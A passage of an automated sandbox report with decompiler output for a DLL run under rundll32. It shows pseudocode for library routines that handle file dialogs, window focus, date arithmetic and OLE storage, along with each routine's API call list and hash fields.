                                                                        							}
                                                                        							return _t53;
                                                                        						}
                                                                        						goto L25;
                                                                        					}
                                                                        					_t60 =  *(_t89 + 0x1c);
                                                                        					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
                                                                        						goto L24;
                                                                        					} else {
                                                                        						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
                                                                        						if(_t63 != 0) {
                                                                        							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
                                                                        						}
                                                                        						if(_t63 == _t87) {
                                                                        							goto L24;
                                                                        						} else {
                                                                        							goto L23;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetKeyState.USER32 ref: 1002F50D
                                                                        • GetCursorPos.USER32(?), ref: 1002F52C
                                                                        • ScreenToClient.USER32 ref: 1002F539
                                                                        • GetCapture.USER32 ref: 1002F586
                                                                          • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                        • ClientToScreen.USER32(?,?), ref: 1002F5CD
                                                                        • WindowFromPoint.USER32(?,?), ref: 1002F5D9
                                                                        • IsChild.USER32 ref: 1002F5EE
                                                                        • KillTimer.USER32(?,0000E001), ref: 1002F62B
                                                                        • KillTimer.USER32(?,0000E000), ref: 1002F647
                                                                          • Part of subcall function 100230BA: GetLastActivePopup.USER32(?), ref: 100230C3
                                                                          • Part of subcall function 100230BA: GetForegroundWindow.USER32(00000000,?,1002F565), ref: 100230D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                                                        • String ID:
                                                                        • API String ID: 1383385731-0
                                                                        • Opcode ID: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                        • Instruction ID: 10a8f74c3fcc8b415ddf3c509ebc5c8d81e0882429dab4cfcda73db0c152bb91
                                                                        • Opcode Fuzzy Hash: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                        • Instruction Fuzzy Hash: 1741AE31600619DFDB11DF65EC88A6E7BF6FF443A4FA18669E511D72A2DB30DE418B00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E1001CE8D() {
                                                                        				int _v4;
                                                                        				struct HWND__* _v8;
                                                                        				void* __ecx;
                                                                        				int _t30;
                                                                        				intOrPtr _t36;
                                                                        				int _t40;
                                                                        				int _t41;
                                                                        				int _t43;
                                                                        				void* _t44;
                                                                        				void* _t52;
                                                                        				signed int _t54;
                                                                        				void* _t64;
                                                                        				signed int _t67;
                                                                        
                                                                        				_t67 = _t54;
                                                                        				_t30 = lstrlenA( *( *((intOrPtr*)(_t67 + 0x70)) + 0x1c));
                                                                        				_t52 = 0;
                                                                        				E10011C50( &(( *( *((intOrPtr*)(_t67 + 0x70)) + 0x1c))[_t30 + 1]), 0,  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x70)) + 0x20)) - _t30 + 1);
                                                                        				_v8 = GetFocus();
                                                                        				 *( *((intOrPtr*)(_t67 + 0x70)) + 4) = E1001EE1E(_t67);
                                                                        				E10022196();
                                                                        				_t36 =  *((intOrPtr*)(_t67 + 0x70));
                                                                        				if( *(_t36 + 4) != 0 && IsWindowEnabled( *(_t36 + 4)) != 0) {
                                                                        					_t52 = 1;
                                                                        					EnableWindow( *( *((intOrPtr*)(_t67 + 0x70)) + 4), 0);
                                                                        				}
                                                                        				_t64 = E100373A5();
                                                                        				if(( *( *((intOrPtr*)(_t67 + 0x70)) + 0x36) & 0x00000008) == 0) {
                                                                        					_push(_t67);
                                                                        					E100237EE();
                                                                        				} else {
                                                                        					 *(_t64 + 0x18) = _t67;
                                                                        				}
                                                                        				_push( *((intOrPtr*)(_t67 + 0x70)));
                                                                        				if( *((intOrPtr*)(_t67 + 0x74)) == 0) {
                                                                        					_t40 = GetSaveFileNameA();
                                                                        				} else {
                                                                        					_t40 = GetOpenFileNameA();
                                                                        				}
                                                                        				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
                                                                        				_v4 = _t40;
                                                                        				if(_t52 != 0) {
                                                                        					EnableWindow( *( *((intOrPtr*)(_t67 + 0x70)) + 4), 1);
                                                                        				}
                                                                        				_t41 = IsWindow(_v8);
                                                                        				_t80 = _t41;
                                                                        				if(_t41 != 0) {
                                                                        					SetFocus(_v8);
                                                                        				}
                                                                        				E1001EE58(_t67, _t80);
                                                                        				_t43 = _v4;
                                                                        				if(_t43 == 0) {
                                                                        					_t44 = 2;
                                                                        					return _t44;
                                                                        				}
                                                                        				return _t43;
                                                                        			}

















                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 1001CE9B
                                                                        • GetFocus.USER32 ref: 1001CEBC
                                                                          • Part of subcall function 10022196: UnhookWindowsHookEx.USER32(?), ref: 100221BB
                                                                        • IsWindowEnabled.USER32(?), ref: 1001CEE9
                                                                        • EnableWindow.USER32(?,00000000), ref: 1001CEFC
                                                                        • GetOpenFileNameA.COMDLG32(?), ref: 1001CF22
                                                                        • GetSaveFileNameA.COMDLG32(?), ref: 1001CF2A
                                                                        • EnableWindow.USER32(?,00000001), ref: 1001CF44
                                                                        • IsWindow.USER32(?), ref: 1001CF4A
                                                                        • SetFocus.USER32(?), ref: 1001CF58
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
                                                                        • String ID:
                                                                        • API String ID: 3606897497-0
                                                                        • Opcode ID: 014ad5681e902ff593bf6bf3649cb216903797f945862ce0a0fb8e4bae70e4d1
                                                                        • Instruction ID: a6979b17d14fe3184cba57d8ea26f243850ffbf7c9edf595d6d18fd7afe56fb8
                                                                        • Opcode Fuzzy Hash: 014ad5681e902ff593bf6bf3649cb216903797f945862ce0a0fb8e4bae70e4d1
                                                                        • Instruction Fuzzy Hash: 3E315675604A089FE722CF35C889E1ABBE6FF44741B10892DF5428B662DB31F896CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 69%
                                                                        			E1001328A(void* __eax, signed int __edx, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v16;
                                                                        				signed int _v20;
                                                                        				intOrPtr _v24;
                                                                        				signed int _v28;
                                                                        				intOrPtr _v32;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				char _t72;
                                                                        				signed int _t74;
                                                                        				void* _t86;
                                                                        				void* _t88;
                                                                        				void* _t90;
                                                                        				void* _t92;
                                                                        				void* _t95;
                                                                        				void* _t98;
                                                                        				void* _t101;
                                                                        				void* _t105;
                                                                        				intOrPtr _t109;
                                                                        				intOrPtr _t111;
                                                                        				void* _t123;
                                                                        				signed int _t124;
                                                                        				signed int _t125;
                                                                        				void* _t127;
                                                                        				signed int _t133;
                                                                        				signed int _t138;
                                                                        				signed int _t139;
                                                                        				void* _t141;
                                                                        				signed int _t145;
                                                                        				signed int _t150;
                                                                        				signed int _t154;
                                                                        				signed int _t156;
                                                                        				signed int _t161;
                                                                        				signed int _t163;
                                                                        				void* _t171;
                                                                        
                                                                        				_t138 = __edx;
                                                                        				_t141 = __eax;
                                                                        				_t72 =  *((intOrPtr*)(__eax + 0x14));
                                                                        				asm("cdq");
                                                                        				_t154 = __edx;
                                                                        				_v16 = _t72;
                                                                        				_v12 = __edx;
                                                                        				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
                                                                        					L30:
                                                                        					_t139 = _t138 | 0xffffffff;
                                                                        					__eflags = _t139;
                                                                        					return _t139;
                                                                        				} else {
                                                                        					_t156 = _v12;
                                                                        					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
                                                                        						goto L30;
                                                                        					} else {
                                                                        						_t74 =  *(_t141 + 0x10);
                                                                        						if(_t74 < 0 || _t74 > 0xb) {
                                                                        							asm("cdq");
                                                                        							_t124 = 0xc;
                                                                        							_t138 = _t74 % _t124;
                                                                        							_t125 = _t138;
                                                                        							asm("cdq");
                                                                        							_v16 = _v16 + _t74 / _t124;
                                                                        							 *(_t141 + 0x10) = _t125;
                                                                        							asm("adc [ebp-0x8], edx");
                                                                        							if(_t125 < 0) {
                                                                        								_v16 = _v16 + 0xffffffff;
                                                                        								 *(_t141 + 0x10) = _t125 + 0xc;
                                                                        								asm("adc dword [ebp-0x8], 0xffffffff");
                                                                        							}
                                                                        							_t161 = _v12;
                                                                        							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
                                                                        								goto L30;
                                                                        							} else {
                                                                        								_t163 = _v12;
                                                                        								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
                                                                        									goto L30;
                                                                        								} else {
                                                                        									goto L16;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							L16:
                                                                        							_t145 =  *(_t141 + 0x10);
                                                                        							asm("cdq");
                                                                        							_v24 =  *((intOrPtr*)(0x1004cecc + _t145 * 4));
                                                                        							_v20 = _t138;
                                                                        							if((E10019490(_v16, _v12, 4, 0) | _t138) != 0 || (E10019490(_v16, _v12, 0x64, 0) | _t138) == 0) {
                                                                        								asm("adc ecx, 0x0");
                                                                        								if((E10019490(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								goto L19;
                                                                        							} else {
                                                                        								L19:
                                                                        								if(_t145 > 1) {
                                                                        									_v24 = _v24 + 1;
                                                                        									asm("adc dword [ebp-0x10], 0x0");
                                                                        								}
                                                                        								L21:
                                                                        								_t138 = _v12;
                                                                        								_t127 = 0;
                                                                        								_t147 = _v16 - 1;
                                                                        								asm("sbb eax, ecx");
                                                                        								_v28 = _v12;
                                                                        								asm("adc edx, ecx");
                                                                        								_v32 = _v16 - 1;
                                                                        								_t86 = E10013780(_v16 + 0x12b, _t138, 0x190, _t127);
                                                                        								asm("cdq");
                                                                        								asm("adc ecx, edx");
                                                                        								_v8 = _t138;
                                                                        								_t88 = E10013780(_v16 - 1, _v28, 0x64, 0);
                                                                        								asm("sbb eax, edx");
                                                                        								_t90 = E10013780(_t147, _v28, 4, 0);
                                                                        								asm("adc eax, edx");
                                                                        								_t92 = E100122A0(_v16, _v12, 0x16d, 0);
                                                                        								asm("adc eax, edx");
                                                                        								asm("adc eax, [ebp-0x10]");
                                                                        								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
                                                                        								_t123 = 0;
                                                                        								asm("sbb eax, ebx");
                                                                        								_t95 = E100122A0(_v8, _v8, 0x18, _t123);
                                                                        								asm("cdq");
                                                                        								asm("adc edx, esi");
                                                                        								_t98 = E100122A0( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
                                                                        								asm("cdq");
                                                                        								asm("adc edx, esi");
                                                                        								_t101 = E100122A0( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
                                                                        								_t131 = _t101;
                                                                        								_t150 = _t138;
                                                                        								asm("cdq");
                                                                        								asm("adc edx, esi");
                                                                        								_t169 = _a4 - _t123;
                                                                        								_v16 =  *_t141 + _t101;
                                                                        								_v12 = _t138;
                                                                        								if(_a4 == _t123) {
                                                                        									_t105 = E10018BEF( &_v16);
                                                                        									L28:
                                                                        									if(_t105 == _t123) {
                                                                        										goto L30;
                                                                        									}
                                                                        									L29:
                                                                        									_t133 = 9;
                                                                        									return memcpy(_t141, _t105, _t133 << 2);
                                                                        								}
                                                                        								E100193FB(_t150, _t169);
                                                                        								_t109 =  *0x1004cde8; // 0x7080
                                                                        								asm("cdq");
                                                                        								_v16 = _v16 + _t109;
                                                                        								asm("adc [ebp-0x8], edx");
                                                                        								_t105 = E100134E7(_t131, _t138,  &_v16);
                                                                        								if(_t105 == _t123) {
                                                                        									goto L30;
                                                                        								}
                                                                        								_t136 =  *((intOrPtr*)(_t141 + 0x20));
                                                                        								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
                                                                        								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
                                                                        									_t111 =  *0x1004cdf0; // 0xfffff1f0
                                                                        									asm("cdq");
                                                                        									_v16 = _v16 + _t111;
                                                                        									asm("adc [ebp-0x8], edx");
                                                                        									_t105 = E100134E7(_t136, _t138,  &_v16);
                                                                        									goto L28;
                                                                        								} else {
                                                                        									goto L29;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}








































                                                                        APIs
                                                                        • __allrem.LIBCMT ref: 10013342
                                                                        • __allrem.LIBCMT ref: 1001335A
                                                                        • __allrem.LIBCMT ref: 10013376
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133B1
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133CD
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133E4
                                                                          • Part of subcall function 100193FB: __lock.LIBCMT ref: 10019413
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                        • String ID: E
                                                                        • API String ID: 4106114094-3568589458
                                                                        • Opcode ID: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                        • Instruction ID: 8c17dd76723e682d1ec04a20f3335422bd29dcdf082c608cde21ea215b529c0d
                                                                        • Opcode Fuzzy Hash: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                        • Instruction Fuzzy Hash: 90716CB5E00219BFEB55DEE8CC81B9EB7B5EB44324F14C1A9E514EB281D774EA808B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E1000B89E(intOrPtr __ecx) {
                                                                        				void* _t115;
                                                                        				intOrPtr _t119;
                                                                        				intOrPtr* _t120;
                                                                        				void* _t121;
                                                                        				intOrPtr* _t122;
                                                                        				intOrPtr* _t124;
                                                                        				intOrPtr* _t126;
                                                                        				void _t128;
                                                                        				intOrPtr* _t130;
                                                                        				long _t133;
                                                                        				void* _t134;
                                                                        				void* _t135;
                                                                        				void* _t136;
                                                                        				void _t138;
                                                                        				void _t140;
                                                                        				void* _t142;
                                                                        				void* _t143;
                                                                        				void* _t146;
                                                                        				void* _t147;
                                                                        				void _t148;
                                                                        				void* _t150;
                                                                        				intOrPtr* _t152;
                                                                        				void* _t153;
                                                                        				void _t157;
                                                                        				void* _t158;
                                                                        				void _t160;
                                                                        				intOrPtr* _t162;
                                                                        				void* _t167;
                                                                        				intOrPtr* _t169;
                                                                        				intOrPtr* _t171;
                                                                        				intOrPtr* _t173;
                                                                        				void* _t174;
                                                                        				intOrPtr* _t176;
                                                                        				intOrPtr _t187;
                                                                        				intOrPtr* _t207;
                                                                        				void* _t211;
                                                                        				void* _t226;
                                                                        				void* _t227;
                                                                        				void* _t228;
                                                                        
                                                                        				E10011BF0(0x1003aeb1, _t228);
                                                                        				_t176 = __ecx + 0x4c;
                                                                        				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
                                                                        				_t115 = E1000A2B0(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x10043068, _t176,  *(_t228 + 0x14));
                                                                        				 *(_t228 + 0x14) = _t115;
                                                                        				if(_t115 < 0) {
                                                                        					L51:
                                                                        					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
                                                                        					return _t115;
                                                                        				}
                                                                        				 *(_t228 - 0x10) = 0;
                                                                        				 *(_t228 - 0x14) = 0;
                                                                        				 *((intOrPtr*)(_t228 + 8)) = 0;
                                                                        				E1000A4B6(__ecx, __ecx + 0x3c);
                                                                        				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
                                                                        				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
                                                                        				if(_t119 != 0) {
                                                                        					L4:
                                                                        					_t226 =  *(_t228 + 0xc);
                                                                        					if(_t226 == 0) {
                                                                        						__eflags =  *(_t228 + 0x10);
                                                                        						if( *(_t228 + 0x10) != 0) {
                                                                        							L15:
                                                                        							_t120 =  *_t176;
                                                                        							_t211 = _t228 - 0x14;
                                                                        							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x100430e8, _t211);
                                                                        							__eflags = _t121;
                                                                        							if(_t121 < 0) {
                                                                        								L42:
                                                                        								if( *(_t228 + 0x14) >= 0) {
                                                                        									L45:
                                                                        									_t122 =  *((intOrPtr*)(_t228 + 8));
                                                                        									if(_t122 != 0) {
                                                                        										 *((intOrPtr*)( *_t122 + 8))(_t122);
                                                                        									}
                                                                        									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
                                                                        										 *(_t228 + 0x14) = 1;
                                                                        									}
                                                                        									_t115 =  *(_t228 + 0x14);
                                                                        									goto L51;
                                                                        								}
                                                                        								L43:
                                                                        								_t124 =  *_t176;
                                                                        								if(_t124 != 0) {
                                                                        									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
                                                                        									_t126 =  *_t176;
                                                                        									 *((intOrPtr*)( *_t126 + 8))(_t126);
                                                                        									 *_t176 = 0;
                                                                        								}
                                                                        								goto L45;
                                                                        							}
                                                                        							__eflags = _t226;
                                                                        							if(_t226 != 0) {
                                                                        								__eflags =  *(_t228 + 0x10);
                                                                        								if( *(_t228 + 0x10) == 0) {
                                                                        									 *(_t228 + 0x14) = 0x8000ffff;
                                                                        									L36:
                                                                        									_t128 =  *(_t228 - 0x14);
                                                                        									L37:
                                                                        									 *((intOrPtr*)( *_t128 + 8))(_t128);
                                                                        									L38:
                                                                        									if( *(_t228 + 0x14) < 0) {
                                                                        										goto L43;
                                                                        									}
                                                                        									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
                                                                        										_t187 =  *((intOrPtr*)(_t228 - 0x20));
                                                                        										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
                                                                        											_t130 =  *_t176;
                                                                        											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
                                                                        										}
                                                                        									}
                                                                        									goto L42;
                                                                        								}
                                                                        								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
                                                                        								__eflags = _t211;
                                                                        								 *(_t228 - 0x2c) = _t133;
                                                                        								if(__eflags > 0) {
                                                                        									L29:
                                                                        									 *(_t228 + 0x14) = 0x8007000e;
                                                                        									 *(_t228 + 0x10) = 0;
                                                                        									L30:
                                                                        									__eflags =  *(_t228 + 0x10);
                                                                        									 *(_t228 - 0x1c) = 0;
                                                                        									if( *(_t228 + 0x10) == 0) {
                                                                        										goto L36;
                                                                        									}
                                                                        									_t134 = _t228 - 0x1c;
                                                                        									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
                                                                        									__eflags = _t134;
                                                                        									 *(_t228 + 0x14) = _t134;
                                                                        									if(_t134 < 0) {
                                                                        										goto L36;
                                                                        									}
                                                                        									_t135 = _t228 - 0x18;
                                                                        									 *(_t228 - 0x18) = 0;
                                                                        									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
                                                                        									__eflags = _t135;
                                                                        									 *(_t228 + 0x14) = _t135;
                                                                        									if(_t135 >= 0) {
                                                                        										_t138 =  *(_t228 - 0x14);
                                                                        										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
                                                                        										_t140 =  *(_t228 - 0x18);
                                                                        										 *((intOrPtr*)( *_t140 + 8))(_t140);
                                                                        									}
                                                                        									_t136 =  *(_t228 - 0x1c);
                                                                        									L21:
                                                                        									 *((intOrPtr*)( *_t136 + 8))(_t136);
                                                                        									goto L36;
                                                                        								}
                                                                        								if(__eflags < 0) {
                                                                        									L26:
                                                                        									_t142 = GlobalAlloc(0, _t133);
                                                                        									__eflags = _t142;
                                                                        									 *(_t228 + 0x10) = _t142;
                                                                        									if(_t142 == 0) {
                                                                        										goto L29;
                                                                        									}
                                                                        									_t143 = GlobalLock(_t142);
                                                                        									__eflags = _t143;
                                                                        									if(_t143 == 0) {
                                                                        										goto L29;
                                                                        									}
                                                                        									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
                                                                        									GlobalUnlock( *(_t228 + 0x10));
                                                                        									goto L30;
                                                                        								}
                                                                        								__eflags = _t133 - 0xffffffff;
                                                                        								if(_t133 >= 0xffffffff) {
                                                                        									goto L29;
                                                                        								}
                                                                        								goto L26;
                                                                        							}
                                                                        							_t146 = _t228 + 0xc;
                                                                        							 *(_t228 + 0xc) = 0;
                                                                        							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
                                                                        							__eflags = _t146;
                                                                        							 *(_t228 + 0x14) = _t146;
                                                                        							if(_t146 < 0) {
                                                                        								goto L36;
                                                                        							}
                                                                        							_t147 = _t228 + 0x10;
                                                                        							 *(_t228 + 0x10) = 0;
                                                                        							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
                                                                        							__eflags = _t147;
                                                                        							 *(_t228 + 0x14) = _t147;
                                                                        							if(_t147 >= 0) {
                                                                        								_t148 =  *(_t228 - 0x14);
                                                                        								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
                                                                        								_t150 =  *(_t228 + 0x10);
                                                                        								 *((intOrPtr*)( *_t150 + 8))(_t150);
                                                                        							}
                                                                        							_t136 =  *(_t228 + 0xc);
                                                                        							goto L21;
                                                                        						}
                                                                        						L10:
                                                                        						_t152 =  *_t176;
                                                                        						_t214 = _t228 - 0x10;
                                                                        						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x10043188, _t228 - 0x10);
                                                                        						__eflags = _t153;
                                                                        						if(_t153 < 0) {
                                                                        							goto L15;
                                                                        						} else {
                                                                        							__eflags = _t226;
                                                                        							if(__eflags != 0) {
                                                                        								E1002A986(_t228 - 0x74, _t214, __eflags);
                                                                        								 *(_t228 - 4) = 0;
                                                                        								E1001D6AF(_t228 - 0x2c, _t228 - 0x74);
                                                                        								_t157 =  *(_t228 - 0x10);
                                                                        								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
                                                                        								_t46 = _t228 - 4;
                                                                        								 *_t46 =  *(_t228 - 4) | 0xffffffff;
                                                                        								__eflags =  *_t46;
                                                                        								 *(_t228 + 0x14) = _t158;
                                                                        								E1002A941(_t228 - 0x74, _t228 - 0x2c);
                                                                        							} else {
                                                                        								_t160 =  *(_t228 - 0x10);
                                                                        								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
                                                                        							}
                                                                        							_t128 =  *(_t228 - 0x10);
                                                                        							goto L37;
                                                                        						}
                                                                        					}
                                                                        					if( *(_t228 + 0x10) != 0) {
                                                                        						goto L15;
                                                                        					}
                                                                        					_t162 =  *_t176;
                                                                        					_push(_t228 + 8);
                                                                        					_push(0x10043198);
                                                                        					_push(_t162);
                                                                        					if( *((intOrPtr*)( *_t162))() < 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(3);
                                                                        					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						 *(_t228 + 0x10) = 0;
                                                                        						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
                                                                        						_t207 =  *((intOrPtr*)(_t228 + 8));
                                                                        						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
                                                                        						_t169 =  *((intOrPtr*)(_t228 + 8));
                                                                        						 *((intOrPtr*)( *_t169 + 8))(_t169);
                                                                        						 *((intOrPtr*)(_t228 + 8)) = 0;
                                                                        						goto L38;
                                                                        					}
                                                                        				}
                                                                        				_t171 =  *_t176;
                                                                        				_t227 = __ecx + 0x6c;
                                                                        				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
                                                                        				if(( *(_t227 + 2) & 0x00000002) == 0) {
                                                                        					goto L4;
                                                                        				}
                                                                        				_t173 =  *_t176;
                                                                        				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
                                                                        				 *(_t228 + 0x14) = _t174;
                                                                        				if(_t174 < 0) {
                                                                        					goto L43;
                                                                        				}
                                                                        				goto L4;
                                                                        			}

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1000B8A3
                                                                          • Part of subcall function 1000A2B0: CoGetClassObject.OLE32(?,?,00000000,100430A8,?), ref: 1000A2D0
                                                                          • Part of subcall function 1002A986: __EH_prolog.LIBCMT ref: 1002A98B
                                                                          • Part of subcall function 1002A941: __EH_prolog.LIBCMT ref: 1002A946
                                                                        • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1000BA2C
                                                                        • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1000BA4D
                                                                        • GlobalAlloc.KERNEL32(00000000,00000000), ref: 1000BAA0
                                                                        • GlobalLock.KERNEL32 ref: 1000BAAE
                                                                        • GlobalUnlock.KERNEL32(?), ref: 1000BAC6
                                                                        • CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 1000BAE9
                                                                        • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1000BB05
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
                                                                        • String ID:
                                                                        • API String ID: 645133905-0
                                                                        • Opcode ID: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                        • Instruction ID: 4fa0019427ba4cc32ee59eeb07c1e68fe65e84f71fb64a57669587eeb3e16f8a
                                                                        • Opcode Fuzzy Hash: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
                                                                        • Instruction Fuzzy Hash: 73C16A70A0064AEFDB11CF64C888DAEBBB9FF89780B204559F941EB265C771DD41CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
